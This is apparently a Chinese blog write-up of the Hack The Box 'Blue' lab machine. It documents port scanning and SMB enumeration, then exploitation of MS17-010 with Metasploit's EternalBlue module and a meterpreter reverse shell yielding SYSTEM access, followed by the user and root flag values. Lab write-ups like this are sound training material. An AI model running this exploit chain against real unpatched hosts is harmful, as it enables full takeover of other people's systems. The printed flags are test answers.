Blue-htb-writeup

0x00 靶场技能介绍

章节技能:nmap漏洞插件扫描、MS17-010漏洞利用

参考链接:https://gist.github.com/05t3/7d5925e6a4585abe2a48cc4a978aea87

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.40

2、扫描下开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate 10000 10.10.10.40 
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 22:25 CST
Warning: 10.10.10.40 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.40
Host is up (0.33s latency).
Not shown: 64752 closed tcp ports (reset), 774 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 31.78 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p 135,139,445 --min-rate=10000 -sC -sV 10.10.10.40                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 22:28 CST
Nmap scan report for 10.10.10.40
Host is up (0.27s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-02-15T14:29:06+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1s, deviation: 3s, median: 0s
| smb2-time: 
|   date: 2024-02-15T14:29:02
|_  start_date: 2024-02-14T20:13:28
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.18 seconds

3、使用 enum4linux 枚举下目标SMB服务,查看下是否有啥发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
┌──(kali㉿offsec)-[~/Desktop]
└─$ enum4linux -a 10.10.10.40                                 
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 15 22:32:00 2024

 =========================================( Target Information )=========================================

Target ........... 10.10.10.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ============================( Enumerating Workgroup/Domain on 10.10.10.40 )============================

[E] Can't find workgroup/domain

 ================================( Nbtstat Information for 10.10.10.40 )================================

Looking up status of 10.10.10.40
No reply from 10.10.10.40

 ====================================( Session Check on 10.10.10.40 )====================================

[+] Server 10.10.10.40 allows sessions using username '', password '' 

 =================================( Getting domain SID for 10.10.10.40 )=================================

do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED 

[+] Can't determine if host is part of domain or part of a workgroup

 ===================================( OS information on 10.10.10.40 )===================================
           
[E] Can't get OS info with smbclient

[+] Got OS info for 10.10.10.40 from srvinfo:                                                                  
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ========================================( Users on 10.10.10.40 )========================================
   
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
                            
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ==================================( Share Enumeration on 10.10.10.40 )==================================
                                                                                                               
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                         

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.40 

 ============================( Password Policy Information for 10.10.10.40 )============================

[E] Unexpected error from polenum:                         

[+] Attaching to 10.10.10.40 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.10.10.40)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

[E] Failed to get password policy with rpcclient 

 =======================================( Groups on 10.10.10.40 )=======================================
                
[+] Getting builtin groups:                                          
[+]  Getting builtin group memberships:                                                 
[+]  Getting local groups:                                                     
[+]  Getting local group memberships:                                                                       
[+]  Getting domain groups:                                          
[+]  Getting domain group memberships: 
 ===================( Users on 10.10.10.40 via RID cycling (RIDS: 500-550,1000-1050) )===================
                                             
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.                                      
                                              
 ================================( Getting printer info for 10.10.10.40 )================================
                                
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED 
enum4linux complete on Thu Feb 15 22:33:19 2024

4、可能工具的原因,没发现些啥,那使用 smbclient 工具继续枚举下SMB服务吧

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -N -L //10.10.10.40          

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Share           Disk      
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

5、这里是发现存在一些工项目录的,但是经过各种尝试,发现入口点并不是显示的这些,这里开始转变思路直接找目标主机的漏洞

1
windows 7 professional 7601 service pack 1 vuln

6、这个版本的主机仿佛存在MS17-010这个漏洞,下面使用nmap进行判断下是否存在吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿offsec)-[~/Desktop]
└─$ nmap -p445 --script smb-vuln-ms17-010 10.10.10.40
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 22:55 CST
Nmap scan report for 10.10.10.40
Host is up (0.32s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 4.09 seconds

7、看情况是存在的,那就使用msf直接开始利用吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
┌──(kali㉿offsec)-[~/Desktop]
└─$ msfconsole                                                                                         
Metasploit tip: Use the resource command to run commands from a file
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce                                                                                                            

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-m
                                             etasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only af
                                             fects Windows Server 2008 R2, Windows 7, Windows Embedded Standa
                                             rd 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affect
                                             s Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7
                                              target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows
                                             Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma
                                             chines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.230.132   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.7
LHOST => 10.10.14.7
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 10.10.14.7:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.7:4444 -> 10.10.10.40:49158) at 2024-02-15 23:06:28 +0800
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 616 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd ../../
cd ../../

C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of C:\

14/07/2009  03:20    <DIR>          PerfLogs
18/02/2022  15:02    <DIR>          Program Files
14/07/2017  16:58    <DIR>          Program Files (x86)
14/07/2017  13:48    <DIR>          Share
21/07/2017  06:56    <DIR>          Users
15/02/2024  15:05    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)   2,391,846,912 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of C:\Users

21/07/2017  06:56    <DIR>          .
21/07/2017  06:56    <DIR>          ..
21/07/2017  06:56    <DIR>          Administrator
14/07/2017  13:45    <DIR>          haris
12/04/2011  07:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   2,391,805,952 bytes free

C:\Users>cd haris
cd haris

C:\Users\haris>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of C:\Users\haris

14/07/2017  13:45    <DIR>          .
14/07/2017  13:45    <DIR>          ..
15/07/2017  07:58    <DIR>          Contacts
24/12/2017  02:23    <DIR>          Desktop
15/07/2017  07:58    <DIR>          Documents
15/07/2017  07:58    <DIR>          Downloads
15/07/2017  07:58    <DIR>          Favorites
15/07/2017  07:58    <DIR>          Links
15/07/2017  07:58    <DIR>          Music
15/07/2017  07:58    <DIR>          Pictures
15/07/2017  07:58    <DIR>          Saved Games
15/07/2017  07:58    <DIR>          Searches
15/07/2017  07:58    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)   2,391,805,952 bytes free

C:\Users\haris>cd Desktop
cd Desktop

C:\Users\haris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of C:\Users\haris\Desktop

24/12/2017  02:23    <DIR>          .
24/12/2017  02:23    <DIR>          ..
14/02/2024  19:47                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,391,805,952 bytes free

C:\Users\haris\Desktop>

8、那就获取下用户的flag信息吧

1
2
3
C:\Users\haris\Desktop>type user.txt
type user.txt
3eeee7e7ef5db3ea8fd15f84a4b2aa6e

0x02 系统权限获取

9、因为我们是SYSTEM权限,已经是系统的最高权限了,那就继续读取下最终的flag信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
C:\Users\haris\Desktop>cd ../../
cd ../../

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of C:\Users\Administrator\Desktop

24/12/2017  02:22    <DIR>          .
24/12/2017  02:22    <DIR>          ..
14/02/2024  19:47                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,391,805,952 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
b79698d7b002d928d02539b3c8e3c02b

C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/51

打靶记
#shooting-range
Blue-htb-writeup
https://sh1yan.top/2024/02/16/Blue-htb-writeup/
作者
shiyan
发布于
2024年2月16日
许可协议